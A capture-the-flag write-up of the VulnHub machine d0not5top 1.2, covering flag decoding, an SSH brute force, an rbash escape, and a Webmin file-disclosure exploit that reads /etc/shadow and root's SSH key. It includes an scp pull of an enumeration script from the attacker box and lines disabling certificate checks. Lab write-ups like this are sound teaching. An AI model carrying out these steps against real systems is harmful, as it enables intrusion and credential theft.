d0not5top Write-up

d0not5top: 1.2 Write-Up by blackroomsec
Time to root: 40 days and 40 nights it felt like. 15 hours in reality over a week and a half.

Challenge URL: https://www.vulnhub.com/entry/d0not5top-12,191/
Author: 3mrgnc3
https://www.vulnhub.com/author/3mrgnc3,422/

Before I begin, all images for this challenge are at the bottom of this page. You will note that this is very long and some things perhaps are over-explained. The reason for this is my blog is geared towards the newer hacker who is still in the early stages of learning. It is at this juncture in their journey that I feel explanations such as the ones I intend to give with this site are most needed. I believe it will reduce the amount of “script kiddies” we have in the future if there are more of us who are trained in the proper stages of a pentest and the comprehension of the concepts and techniques discussed constantly in this field.

This is my goal with my research as I strive to be a competent security researcher rather than the lazy hacker I am most days.

One of the things I have noticed with other write-ups is that they assume the reader knows more than they actually might so I like to explain not only my way of thinking but why I’m using a particular command versus another (sometimes it’s just I chose that one over the other) and other things that a typical write-up will not have.

I also wish to say that I am no expert and that I also read other hacker’s write-ups to learn new techniques and clarify my understanding of certain topics.

We all had to start somewhere so please bear with me and skip over the parts you know about.

————————————
Objective
————————————

This is my second public Boot2Root, It’s intended to be a little more difficult than the last one I made. That being said, it will depend on you how hard it is 😀 It’s filled with a few little things to make the player smile.
Again there are a few “Red Herrings”, and enumeration is key.
DIFFICULTY ?????
CAPTURE THE FLAGS
There are 7 flags to collect, designed to get progressively more difficult to obtain

————————————
Tools Used
————————————

python ping sweep script from here: http://stackoverflow.com/questions/21225464/fast-ping-sweep-in-python
nmap
DirB
grep
nikto
dirb
20 cups of coffee
Frustrated battle-cries into the night
Hair-pulling
…..and everything else at my disposal. So EVERYTHING. Just everything!

————————————
Recon
————————————

Attack Box Kali Linux IP: 192.168.168.116
Victim Box D0Not5top IP: 192.168.1.149

I note the title is in LeetSpeak and keep in mind that I have a few wordlists of this kind in case they will be needed. Also, check this link out on making your own wordlists http://adeptus-mechanicus.com/codex/makdict/makdict.html

Now I want to do a ping sweep to discover our friend on the network. There’s 40 million ways to accomplish this. No way is the right way but learn as many as you can and TAKE NOTES. Your notes are your lifeblood in this business. Fping way is fast too. I like to use different tools with different challenges to change things up a bit and to keep my hacking life from getting stale. This script is fast and gives me what I need.

I save the script in a file on my desktop I call “sweeper.py”, make it executable (chmod +x) and run it.

————————————
Scanning
————————————

Next step is to port-scan it. Firing up Nmap!

Hooboy. So much to play with here! There are a few things which jump out at me, EXIM and DNS being one. But I want to start at the webserver and work my way back if necessary.

If you’re just learning about web applications (and I am too, we are all always learning!), allow me to recommend this book:

The Web Application Hacker’s Handbook

While there are many excellent books on the topic as well, I like this one a lot.

First thing I always check on a site is the source and robots.txt, and from the output this site has one. No source here, though.

Looks like we may need to change our user-agent somewhere since it’s saying the terminal knows where to go. I have User-Agent Switcher on my system but you can also do it manually in the overrides of your browser.

Always learn alternate ways to do things. Minimally you should know two to three ways to accomplish the same goal so you don’t get stuck as often in the future. You should also have downloadable tools available to you versus tools which are web-based in case you don’t have web connectivity.

Always think “If I don’t have access to the Internet, how do I do this with what I have available?”

I’m not going to go to each directory manually; that would take up too much time. Time to do some directory enumeration with DirB by The Dark Raver.

The output is ridiculously large and unusable in its current format. So now what I want to do is manipulate the file a little to show me just what I want to see. Grep to the rescue! Seriously learn this tool, collect snippets of commonly used commands you will need and store them some place safe. Pastebin and Ghostbin are filled with snippets of many different programming and scripting languages that you can research.

In this case, I want grep to show me all lines which have the words DIRECTORY and SIZE in them but ignore any lines which have “:0” since a SIZE:0 means an empty file. Then in the next command I’m going to sort the file in place and recreate it so that I have a nice sorted file of all directories I can access versus ones I can’t.

I had to snip this because it’s too long.

This still isn’t ideal as the author already mentioned red herrings and I know there’s going to be dead-ends because of it. I check a few and my suspicions are confirmed, empty directories mostly. Except the control directory catches my eye in addition to PHPMyAdmin.

First let’s go to the “control” directory. The page is a DNS Control Panel. No links on the page work as far as I could see.

I check the source of the index.html page and see Flag 1 !!!
http://192.168.1.149/control/index.html
<!-- FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w -->

A little further down in the same source code I see a message

<div class="fluid-ratio-resize"></div>
<!-- M3gusta said he hasn't had time to get this w0rKING.
Don't think he's quite in the 20n3 (zone) these days since his MadBro made that 7r4n5f3r (transfer), Just Couldnt H@cxk Da D0Not5topMe.ctf --!>

What, transfer? Zone transfer, mayhaps? I know it has DNS on it from my NMAP output and the hostname so….

Now I check the JS directory and see it has directory listing enabled. I go into the README.MadBro file and it’s confirmed:

Interesting. Reference to /etc/hosts? That definitely means DNS. I write this down to change and concentrate on the next part.

The wording underneath looks like binary to me.

I convert the binary portions of it to decimal in my terminal and fill in the ASCII portions of it in between. Flag # 2!

When all finished it converts to: FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Now let’s open it up in our browser.

Message board. I admit I got briefly excited here and I think it was the point which is why he added it.

I create the username “admin” and password “123456” and login. There is a neat little trick we can do to upload a shell script inside an image via a user’s avatar on certain PHP message boards and since I know this I already have Pentest Monkey’s Reverse Shell hidden in a JPG and a GIF file ready for the uploading! It’s one of my favorite hacks to do.

I start a listener on my Kali Box first to catch my shell. It’s set to listen on my local port 1337 which I had to edit the code to point it to.

Now I need to see where my shell is so I can execute it. I “inspect element” on the image itself in my profile screen because if you try to view the profile you get a blank page. By inspecting it I can hopefully see the path to the image.

I see that my image is stored in the “download” directory and my dirb scan confirms there is a “download” directory from earlier.

http://d0not5topme.ctf/download/file.php?avatar=48_1495480031.gif

This does not work when I go to view the file, the shell doesn’t connect. So it’s not vulnerable to this type of attack. So, why make a message board then, if I can’t leverage it?

I don’t like things that don’t make sense. The author of this challenge didn’t go through the trouble to install this board if its existence wasn’t important or notable in some way.

I click around and somehow get this error. So now I have a username of “megusta” and a new domain. G4M35.ctf

Megusta@G4M35.ctf

I start up Live Headers and start clicking around to see if there’s anything I can see in the header info that might be a flag or a path to one.

One thing I want to say about web apps, check EVERYTHING. Source code, robots, headers, cookies, mail headers (if you interact with it in this way), everything you can get your hands on. You won’t believe the amount of things which are hidden in plain sight. Sometimes on purpose. And, especially if a hacker is the owner of the site. We love us our easter eggs!

On this board, I can’t send a private message or post or do anything but create a username and edit my profile. I logout and decide to view the headers if I start clicking buttons as a guest.

When I click the “I do not agree to those terms” button I see this

I thought a modified Morse code but no, it wasn’t. To check, I pasted it into my Morse Decoder app on my system. It doesn’t recognize it.

I had never seen this before. Now that I have I copy this into my hacking notes database for the future. I have all types of alternative alphabets (Sherlock’s Dancing Men, Runes, International Flag Codes, etc) for situations like this.

But in this case I have no idea so I pasted the whole thing into Google and from the results determined it was in “Brainf**k” text.

Turns out Dcode has a decoder for it. This site has served me and every other hacker who uses it well for years. Anyone that does a CTF should have this site in their notes to use.

Decoded, it is:

FL46_4:n02bv1rx5se4560984eedchjs72hsusu9

That’s flag 4.
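The Brainf**k text above was decoded through dCode; as an added example that is not part of this write-up, here is a small interpreter that does the same job offline (useful when, as advised earlier, you have no Internet access). The sample program is constructed for this example and only prints the flag prefix; it is not the challenge's own header text.

```python
# Added example, not from the original write-up: a minimal Brainf**k
# interpreter for decoding this kind of text without a web service.


def run_brainfuck(program: str, input_data: bytes = b"", max_steps: int = 1_000_000) -> str:
    """Execute a Brainf**k program and return everything it prints as text.

    Cells are unsigned bytes (wrap at 256), the tape grows to the right on
    demand, and max_steps bounds the run so a malformed program cannot hang us.
    """
    code = [c for c in program if c in "<>+-.,[]"]  # every other char is a comment
    # Pre-compute matching brackets; unbalanced brackets are rejected up front.
    jump, stack = {}, []
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at command {pos}")
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at command {stack[-1]}")

    tape = [0]
    ptr = pc = steps = 0
    inp = list(input_data)
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif ch == "<":
            if ptr == 0:
                raise IndexError("pointer moved left of cell 0")
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = inp.pop(0) if inp else 0  # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]  # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]  # back to the loop start
        pc += 1
    return out.decode("latin-1")


# Constructed sample: 7 x 10 = 70 ('F'), then +6 = 76 ('L'), the flag prefix.
SAMPLE_PROGRAM = "+++++++[>++++++++++<-]>.++++++."

if __name__ == "__main__":
    print(run_brainfuck(SAMPLE_PROGRAM))
```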

But where’s flag 3?

Now I want to check out that SMTP server because I suspect flag 3 is there but I also know there’s an RCE sploit of EXIM rolling around out there and I want to see if it’s vulnerable. I netcat into SMTP.

Ahh, hex. Another flag, perhaps?

Flag # 3!

I try some commands like VRFY with that email address we were given and get Authorization prohibition errors. He’s thought of this too. No dice and no path forward here that I can see.

Moving on, I add the entry for G4M35.ctf into my /etc/hosts and scan it with Nikto.

This took me a while to go through. Lots of directories, lots of files.

In the http://g4m35.ctf/src/game.js file there’s a reference to /H3x6L64m3

And there’s a directory http://g4m35.ctf/H3x6L64m3/

When you play the game you see hex code in the background! Too frickin cool.

I can see the beginnings of a troll face but I really don’t want to play this thing through to the top to see everything. So now I go about poking around to see if I can see the images themselves.

In the http://g4m35.ctf/H3x6L64m3/bkcore/hexgl/tracks/Cityscape.js file I see this, which catches my attention:

Then with further poking around I see this clue in the http://g4m35.ctf/H3x6L64m3/bkcore/threejs/Loader.js file

So I change

http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/%1.jpg to
http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/px.jpg

and so on

http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/nz.jpg
http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/pz.jpg

And now the decimals are the same in each image.

Now I convert the Decimal to ASCII

and get Flag # 5!!

FL46_5:09k87h6g4e25gh44wa1rybfi898hncdt

Now I’m stuck. I believe I’ve looked through every file there was to see. I’m missing Flags 6 & 7.

All I can really do right now is play the Missile and Hex games. Which, once again, he didn’t just upload for nothing. This took time to put together. Which means we should spend some time playing them and see what happens.

The missile game was fun but I didn’t see anything else to move forward so I tried the racing game.

As soon as it started I veered the ship off the track by sheer accident and a message flashed across the screen with a new URL.

http://t3rm1n4l.ctf

So that was a good mistake! I added it to my hosts file

I also try to enumerate directories

I look through the javascript and nothing stands out to me that I can use to move forward.

Checking the source code I see the Terminal script is written by Fluid Byte:

PHP+JQuery Temrinal Emulator by Fluidbyte <http://www.fluidbyte.net>

I now read the documentation and see this in it:

https://github.com/Fluidbyte/PHP-jQuery-Terminal-Emulator/blob/master/term.php

define('ROOT','/var/www');
define('PASSWORD','terminal');
define('BLOCKED','ssh,telnet');

But terminal isn’t the password and you can’t view the term.php

After trying all the words in this challenge I finally tried “t3rm1n4l.ctf” and that was the proper password.

Now I begin to issue it basic Linux commands. It kept logging me out which was frustrating.

After maybe 100 different things I tried, I tried this as this is the format for the flags in this challenge.

grep FL4 *.*

grep: AAAAAAAAAAA: Is a directory
grep: BBBBBBBBBBB: Is a directory
grep: CCCCCCCCCCC: Is a directory
grep: M36u574.ctf: Is a directory
grep: XXXXXXXXXXX: Is a directory
grep: YYYYYYYYYYY: Is a directory
grep: ZZZZZZZZZZZ: Is a directory

And now I have a new host!

The index page has a slideshow of rapidly scrolling images. I need to see what images it is loading. I view it in Live Headers again and I was able to get the path to the one image which was different:

http://m36u574.ctf/images/kingmegusta.jpg

I thought perhaps it was a stego, so I downloaded it and used exiftool to view the metadata

My suspicions are confirmed when I see the Comment:

In the comments there was some Base64 text

When decoded I see it’s a hash

MeGustaKing:$6$e1.2NcUo$96SfkpUHG25LFZfA5AbJVZjtD4fs6fGetDdeSA9HRpbkDw6y5nauwMwRNPxQnydsLzQGvYOU84B2nY/O40pZ30

Let’s crack it with the infamous RockYou wordlist

————————————
Gaining Access
————————————

Logged in I see all this.

I see another Base 64 string

converts to

Pulled out of that and also decoded from Base64, it converts to

FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey

So we’ve got Flag #6!
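Flags 2, 3, 5 and 6 above each came out of a different encoding: 8-bit binary groups in README.MadBro, hex in the SMTP banner, decimal byte values in the skybox images, and Base64 wrapped in Base64. As an added example (not code from this write-up), the helpers below decode each of those offline and, when the encoding is not obvious, try all four; every sample input is constructed and encodes only the shared prefix "FL46", not a real flag.

```python
import base64
import binascii
import re

# Added example, not from the original write-up: offline decoders for the
# four encodings the flags on this box used. All sample data is constructed.

def decode_bits(text: str) -> str:
    """8-bit binary groups, spaced or run together, to text (README.MadBro style)."""
    bits = re.sub(r"\s+", "", text)
    if not bits or len(bits) % 8 or set(bits) - {"0", "1"}:
        raise ValueError("input is not a whole number of 8-bit groups")
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))

def decode_decimals(text: str) -> str:
    """Whitespace-separated decimal byte values to text (skybox image style)."""
    values = [int(tok) for tok in text.split()]
    if any(not 0 <= v < 256 for v in values):
        raise ValueError("decimal value outside the byte range")
    return bytes(values).decode("latin-1")

def decode_hex(text: str) -> str:
    """Hex bytes to text, tolerating spaces, colons and 0x prefixes (SMTP banner style)."""
    cleaned = re.sub(r"0x|[\s:]", "", text, flags=re.IGNORECASE)
    return bytes.fromhex(cleaned).decode("latin-1")  # ValueError on a bad digit / odd length

_B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")

def decode_base64_layers(text: str, max_layers: int = 5) -> str:
    """Peel nested Base64 (flag 6 was Base64 inside Base64) until the result stops
    looking like Base64 or stops being printable ASCII. That stop rule is a heuristic
    (plain text can be valid Base64 by accident), hence the layer cap and a human check."""
    current = text.strip()
    for _ in range(max_layers):
        if len(current) % 4 or not _B64.fullmatch(current):
            break
        try:
            candidate = base64.b64decode(current, validate=True).decode("ascii").strip()
        except (binascii.Error, UnicodeDecodeError):
            break
        if not candidate or not candidate.isprintable():
            break
        current = candidate
    return current

DECODERS = {
    "binary": decode_bits,
    "decimal": decode_decimals,
    "hex": decode_hex,
    "base64": decode_base64_layers,
}

def try_all(blob: str) -> dict:
    """Run every decoder and keep the ones that yield printable text.
    More than one can succeed ("70 76" is valid decimal and valid hex), so the analyst
    still chooses; on this box the FL46_ prefix makes the right answer obvious."""
    results = {}
    for name, decoder in DECODERS.items():
        try:
            out = decoder(blob)
        except ValueError:  # binascii.Error and UnicodeDecodeError are ValueError subclasses
            continue
        if out and out.isprintable() and out != blob.strip():
            results[name] = out
    return results

# Constructed samples: each one encodes "FL46", the prefix every flag shares.
SAMPLES = {
    "binary": "01000110 01001100 00110100 00110110",
    "decimal": "70 76 52 54",
    "hex": "46 4c 34 36",
    "base64": base64.b64encode(base64.b64encode(b"FL46")).decode(),  # two layers deep
}

if __name__ == "__main__":
    for kind, blob in SAMPLES.items():
        print(f"{kind:8s} {blob!r:45s} -> {try_all(blob)}")
```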

There’s a message that we’re in the “rush” shell and that we are not “burtieo” which I’m assuming is a username. I have no other passwords so I’m going to use Hydra to attack the SSH server, supplying it with the username “burtieo” and the rockyou wordlist again since the last user it said was Rockyou. I also went to sleep because I knew this would take a while.

An hour and a half later, it had it. But I didn’t see this until the following morning.

I also have a restricted shell. LOL Because OF COURSE I have a restricted shell to deal with now!

Jail escapes are a lot of fun. In learning the variety of ways they can be done, you also get to learn why they are possible. I have provided a bunch of links at the bottom of this page so you can research these different techniques and which shells they are possible on.

The first step when encountering one is to determine what you CAN and CAN’T do and what kind of environment you’re working with. This starts with asking the restricted shell for help.

Three things catch my eye: “compgen”, “declare” and “export”. I recently read a write-up by a hacker who did a similar rbash jail escape during this year’s Boston Key Party which I had planned on doing (even signed up for it!) but got stuck dealing with ADULTING and was pissed I missed it.

This is that article.

https://losfuzzys.github.io/writeup/2017/02/27/bkpctf2017-solitary-confinement/

We’ll get to declare in a moment. The idea at this stage with a restriction is to continue seeing what you can’t see and do. So you can focus on what you CAN see and do. The problem is you are limited in HOW you can see and do them.

As a hacker it’s your job to get around these obstacles by manipulating what you can do and sometimes leveraging a vulnerability present in what you can’t do which allows you to do it because it’s not configured properly.

As for compgen, I know I can use it to list directories, files and what commands are available to me. Which I need because I have no idea what files are present in the system at this point and I need an entry-point, specifically, a world-writable directory if I can find one.

Since with this shell I cannot LS, I have no choice but to look for alternatives.

burtieo@D0Not5top:~$ ls
-rbash: ls: command not found

compgen -c will tell me what commands are available on the system outside this particular restricted environment (this is snipped)

suedoh? What’s THAT? I make a note to come back to it.

I now need to confirm where these commands are stored in the system so I can access them.

I am NOT assuming they are in the usual places they should be because we’re dealing with a hacker who has considerable skill here, so he could’ve done anything.

Since this shell also doesn’t let me see filenames because cat doesn’t work, how can I leverage compgen to show me filenames? Easy! With the -f switch!

These are snipped.

Now I know where LS and other commands I might use are stored.

Want to see directories? Supply it with the -d switch! And as you see with this command you can use the / character whereas in the restricted shell if you try, it gives you a restricted error. 🙂

burtieo@D0Not5top:~$ compgen -d /etc/

So now the next time you’re in a restricted shell and you can’t LS, but you can use compgen, you’ll know how to view files and directories.

I’m demonstrating this because this particular challenge provides an excellent opportunity to showcase different ways to accomplish the same goal. Before I continue, I do realize there are a few ways to escape this VM’s shell. However, even though I’m aware of the other ways, I specifically didn’t do them that way because then I don’t advance my skills and broaden my knowledge of attack vectors I know how to do.

To learn more about compgen read this: http://www.serverwatch.com/server-tutorials/a-look-at-the-compgen-bash-builtin.html

and this https://www.gnu.org/software/bash/manual/bash.html#Programmable-Completion-Builtins

Now let’s get the hell out of this jail.

Let’s go back to the write-up I read from the other hacker faced with the same rbash environment.

If we first use declare we can manipulate the PATH and get all the commands we need in the directories we specify in the PATH command. We then use export to run it. Followed by bash to get out of the shell and now we are unrestricted.

————————————
PrivEsc
————————————

At this stage, we now want to escalate our privileges from “burtieo” to root or another user that has more privileges than we have.

I spent some time manually looking for world-writable directories and the like and then decided to upload the LinEnum.sh script found here to do my dirty work for me.

I have this script already on my Kali Box but I don’t always like to rely on automated scripts because then I don’t learn and it’s fun to type the commands yourself.

In this case, because he’s put shit EVERYWHERE, I am not going to lose two months of my life trying to find them. I need help.

Since I have unrestricted access I first check to see if the /tmp directory is writable and executable for burtieo.

I need a place to run my LinEnum script.

I can write to it. Can I execute?

No VIM. Vi?

Yes, I can!

Now let’s use SCP to transfer the file from my Kali Box to my victim. You can also use netcat or anything else available to you. SCP to me, if available, is faster and easier.

********Please note that if you’re running as root on Kali you need to allow root access to SSH in your sshd_config file and start the service if it’s not already running*********
burtieo@D0Not5top:/tmp$ scp root@192.168.1.116:enum.sh /tmp/
root@192.168.1.116’s password:
enum.sh 100% 42KB 42.3KB/s 00:00

burtieo@D0Not5top:/tmp$ ls
blackroomsectest
enum.sh
systemd-private-80074acc235b4afa9865b94dffde935f-pdns.service-HlkmX2

burtieo@D0Not5top:/tmp$ chmod +x enum.sh

This is snipped

Oh wow! We can run commands as root without its password! And we have an executable file that we can run!

It counts down from 20 and asks if we caught 10kilo?

On my desk I have a literature holder with all of my cheatsheets. The first one I have is a list of common ports. 10000 is webmin.

I try to connect to it via Firefox and it gives me a weak server key.

There is a slightly lengthy workaround circulating which explains how to fix this that I’m not doing because I’m doing this challenge on my production Kali box and I don’t want to be playing around with SSL certs and the like. Because SEKURITY!

So?

I download Firefox version 29.01, with which I know I can bypass this restriction, and fire it up.

I can now see the webmin interface. Problem is? I don’t have a password. I know the default username is admin but after trying a few things, my laziness kicks in and I decide I don’t want to keep getting cramps in my fingers typing into oblivion.

So now I’m driven to get the /etc/shadow file so I can get the root hash.

I look up the version of webmin on the system

burtieo@D0Not5top:/etc/webmin$ cat version
1.280
burtieo@D0Not5top:/etc/webmin$

I immediately search for an RCE, PrivEsc or Arb File Disclosure sploit and find the latter.

Perfect! There’s two.

One using CURL and PHP and the other using PERL.

https://www.exploit-db.com/exploits/1997/

I try the CURL one but it errors out which tells me something on my system is missing or not configured.

I don’t want to play tech support for ten more hours when I’m THIS close to root.

I look at the PERL one. https://www.exploit-db.com/exploits/2017/

There’s a note which says I have to have LWP which I do. Okay good!

So here’s the setup:

On the SSH session logged in as burtieo I start the “wmstrt” process. I have a 20 second window of opportunity.

On my Kali box I copy the exploit code into a file called “webmin.pl”, make it executable and run it on my local Kali terminal.

It runs but errors out saying “certificate verify failed” which is the same problem Firefox’s later versions are having.

So I have to play tech support after all.

Side note: As a hacker you’re going to do a LOT of tinkering with scripts in order to get ahead.

I now look up how to make PERL ignore the cert.

https://stackoverflow.com/questions/17756776/perl-lwp-ssl-verify-hostname-setting-to-0-is-not-working

I add the following two lines to the top of the exploit:

$ENV{PERL_NET_HTTPS_SSL_SOCKET_CLASS} = 'Net::SSL';
$ENV{'PERL_LWP_SSL_VERIFY_HOSTNAME'} = 0;

I then re-execute the process as burtieo and re-execute my script and do I have the /etc/shadow file???????????????

————————————
Path to Root
————————————

SILLY RABBIT TRIX ARE FOR KIDS! Of course I do!

To get this to work you have to specify “1” for HTTPS which the remote host is using and because it is using a 1028bit key, which Firefox deems as “weak”, this is the cause of the SSL cert problem.

With this exploit we can read any file as root. We can’t write or execute any file as root though.

Now I need to crack the root password in order to get in as root.

Same thing, crack it with RockYou using JtR. Except, JtR *and* Hashcat suddenly weren’t working on my system.

I’ve been breaking things of late (namely NMAP and Metasploit to name just two) so I want to see if I can get in another way without his password.

In fact I am PRAYING I can because if I can’t, I’m screwed and can’t finish this challenge! I can’t assume though. I need to know for sure.

If I can’t then I have to figure out why JtR and hashcat are broken and my life is going to be nine kinds of SUCK. Eventually I’ll fix them, just not right now.

I want to see the sshd_config file to see if I can actually login as root over SSH. If I can’t, cracking his password is pointless since I can’t use it anyway.

The only other way in is to use his RSA key.

Can I read it and see what I’m dealing with, though?

I was right, but guess what?!

YEAH BOY! I don’t need his password! We can use his RSA key to login to SSH!

How do we get his RSA key?

Using the webmin exploit again except this time we’ll grab that!

But, it’s encrypted, which means we need to find out the passphrase first in order to decrypt it.

Before we can crack the passphrase, we have to get the hash from it.

(I re-installed JtR and got it working for the remainder of this challenge. It was erroring out on SHA512 – Hashcat still broken though. )

Now we crack the passphrase in the hash

Using OpenSSL’s feature to convert the key, we supply it with the passphrase.

And now, using our Kali Box’s terminal, we supply SSH with the ‘-i’ switch and login to the remote as root 🙂

Am I root?! YOU BET YOUR SWEET ASS I’M ROOT.

Now to get the last flag. Let’s see what we can see.

Looks like it’s trying to create a socket? I’m so tired at this point that I just decode the shellcode to get the last flag.

All decoded the last flag is FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk

and a final message from the author to never assume! Ha! I said that earlier, didn’t I?

————————————
Flags
————————————

FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w

FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

FL46_3:29dryf67uheht2r1dd4qppuey474svxya

FL46_4:n02bv1rx5se4560984eedchjs72hsusu9

FL46_5:09k87h6g4e25gh44wa1rybfi898hncdt

FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey

FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk

————————————
Conclusion – Special Remarks
————————————

This was a Pyrrhic victory for me yet strangely gratifying to do. For some reason I spent more time getting to know this particular challenge than any other. There is brilliance in this and I appreciate genius when I see it. Hats off to 3mrgnc3 for creating this.

I always say, the joy of what we do is in the discovery, the learning new techniques and going out of our comfort zone to broaden our horizons. I look forward to the author’s next entry in the boot2root world.

I have no idea what the User-Agent GameTerminal was about. If someone knows please DM me on Twitter.

Also, what was up with the socket?

There are three other hidden games on this box.

http://g4m35.ctf/arena5/
http://g4m35.ctf/AsteroidsReloaded/
http://g4m35.ctf/candyrunner/

He created another version of sudo called “suedoh” but I didn’t use it.

————————————
Challenge Images
————————————

————————————
Resources
————————————

https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

https://netsec.ws/?p=337

Read these to understand a bit more about RSA and SSH and why I was able to login as root without the password
https://stackoverflow.com/questions/2821736/whats-the-difference-between-id-rsa-pub-and-id-dsa-pu